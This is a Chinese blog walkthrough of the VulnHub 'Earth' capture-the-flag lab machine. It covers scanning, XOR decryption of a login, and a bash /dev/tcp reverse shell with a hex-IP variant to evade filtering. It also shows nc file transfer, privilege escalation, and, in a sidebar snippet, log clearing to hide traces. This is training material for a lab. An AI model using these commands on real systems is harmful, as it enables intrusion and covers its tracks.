Earth 靶机实战

最新推荐文章于 2024-05-17 10:46:27 发布
最新推荐文章于 2024-05-17 10:46:27 发布
阅读量257 收藏 3
点赞数 5
分类专栏: Vulnhub靶机实战 文章标签: web安全 网络 web 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/braty_/article/details/137560597
版权

信息收集:

1.Nmap存活扫描:

└─# nmap -sn 192.168.10.1/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-09 14:03 CST
Nmap scan report for 192.168.10.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.10.2
Host is up (0.00047s latency).
MAC Address: 00:50:56:E5:B1:08 (VMware)
Nmap scan report for 192.168.10.137  //靶机
Host is up (0.00033s latency).
MAC Address: 00:0C:29:24:27:1A (VMware)
Nmap scan report for 192.168.10.254
Host is up (0.0015s latency).
MAC Address: 00:50:56:E5:67:59 (VMware)
Nmap scan report for 192.168.10.135
Host is up.

2.端口扫描:

3.服务探测:

发现DNS解析,我们在 etc/hosts 里面添加一下:

vim /etc/hosts
192.168.10.137  earth.local
192.168.10.137  terratest.earth.local

4.nmap服务漏扫:

无漏洞信息

Web打点:

1.目录爆破:

发现登陆页面,但不存在SQL注入

扫另一个网站:

发现君子协议,robots.txt 访问查看内容。

发现文件,尝试访问,发现格式为 .txt

测试安全消息系统注意事项: 
*使用XOR加密作为算法,应该像在RSA中使用的那样安全。 
*地球已经确认他们收到了我们发送的信息。 
*testdata.txt用于测试加密。 
*terra用作管理门户的用户名。 
Todo: 
*我们如何安全地将每月的密钥发送到地球?还是我们应该每周更换钥匙? 
*需要测试不同的密钥长度以防止暴力。钥匙应该有多长? 
*需要改进消息传递界面和管理面板的界面,这是目前非常基本的。

这里给出了加密的提示XOR异或加密,应该是要我们解密首页给出的密文。

密钥是 https://terratest.earth.local/testdata.txt

密文只有第三个是密码。

账密:terra/earthclimatechangebad4humans

登录成功,发现命令执行页面:

2.shell:

直接反弹shell

bash -i >& /dev/tcp/192.168.10.137/2233 0>&1  //反弹失败,可能做了过滤
我们对ip地址进行16进制转换
0xc0.0xa8.0xa.0x87
bash -i >& /dev/tcp/0xc0.0xa8.0xa.0x87/2233 0>&1

3.提权

这里发现提权失败,把文件上传到kali,分析一下啥问题。

nc -lvnp 3344 > tmp
nc 192.168.10.135 3344 < /usr/bin/reset_root

strace 工具分析:

是靶机上缺少这三个文件夹导致的,创建文件夹再次启动:

提权成功!!

flag:

kitha.
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机操作练习,earth 靶机实战练习
09-08
学习
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
Earth靶机实验实战演练
lianliandad的博客
11-01 909
好好学习
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets: Earth
Aluxian_的博客
07-08 970
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。
靶机渗透练习84-The Planets:Earth
hirak0的博客
04-27 2091
靶机描述 靶机地址:https://www.vulnhub.com/entry/the-planets-earth,755/ Description Difficulty: Easy Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience.
打靶分享:VulnHub-Earth
weixin_66249173的博客
01-07 1067
此时使用nmap -sC 10.0.0.141发现了不一样的内容,就是443端口这里发现了DNS的两个域名,所以我就查了一下-sC这个参数(平时信息收集其实用的不多)所以,最好的解决办法就是直接在终端打开虚拟机火狐浏览器并访问earth.local和terratest.earth.local在第一个域名中如果想发送message必须要输入message key。此时就可以访问这两个域名了,但是不要用物理机的浏览器直接访问。现在就差解密的内容了,显然下面这张图中的那三行是我们要解密的内容。
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets Earth_vulnhub earth(1)
2401_84715926的博客
05-12 599
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。
VulnHub靶场----Earth
qq_61670993的博客
10-18 475
Vulnhub靶场初体验
靶机渗透练习82-The Planets:Mercury
hirak0的博客
04-25 5047
靶机描述 靶机地址:https://www.vulnhub.com/entry/the-planets-mercury,544/ Description Difficulty: Easy Mercury is an easier box, with no bruteforcing required. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested o
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
freeking101的博客
07-02 8655
Nmap 是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具。软件名字 Nmap 是Network Mapper 的简称。Nmap 最初是由Fyodor在1997年开始创建的。随后在开源社区众多的志愿者参与下,该工具逐渐成为最为流行安全必备工具之一,号称扫描之王。...................................................
靶机happycorp实战练习
09-08
学习
CTF6靶机实战.zip
05-25
CTF6靶机实战包括三部分: 1)靶机实战过程 2)文件上传的反弹shell文件(shell.php) 3)系统版本漏洞需要的文件(8478.sh)
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 642
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
了解网络安全行业内有哪些公司?
aheyor的博客
05-14 949
https://wenku.baidu.com/view/8de38c790440be1e650e52ea551810a6f424c80f?aggId=f2f58cc8e618964bcf84b9d528ea81c758f52ecc&fr=catalogMain_text_ernie_recall_feed_index%3Awk_recommend_main4&_wkts_=1715651666515&bdQuery=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85
Web安全:企业如何抵御常见的网络攻击?
m0_66326520的博客
05-16 691
针对网站的攻击有多种形式,攻击者既可以是业余黑客,也会是协同作战的职业黑客团伙。最关键的一条建议,就是在创建或运营网站时不要跳过安全功能,因为跳过安全设置可能会造成严重后果。虽然不可能完全消除网站攻击风险,但你至少可以缓解遭攻击的可能性和攻击后果的严重性。遭受攻击后,不仅需要及时的响应处置还需要避免同类事件的发生,因此事后的复盘分析尤为重要,做好安全防护才是最高效的网络攻击解决方案。
网络安全】Linux 应急响应-溯源-系统日志排查知识点
最新发布
weixin_43822401的博客
05-17 324
编辑或;
网络安全】系统日志清理的操作步骤
weixin_43822401的博客
05-16 188
如果访问了某些服务,比如说通过 apache 服务获得一个 shell,你还需要清理 apache 服务的访问日。删除登录成功记录:echo > /var/log/wtmp (此时执行 last 命令就会发现没有记录)仅本地清理,如果目标服务存在日志服务器的话,所有日志还会被保留。这里仅清理系统相关日志,3. 删除日志记录:echo > /var/log/secure。删除登录失败记录:echo > /var/log/btmp。删除系统日志目录下的一些日志文件。1. 访问失败的日志。2. 访问成功的日志。
the planets: earth靶机
04-11
问题:关于行星:地球和静机。...回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值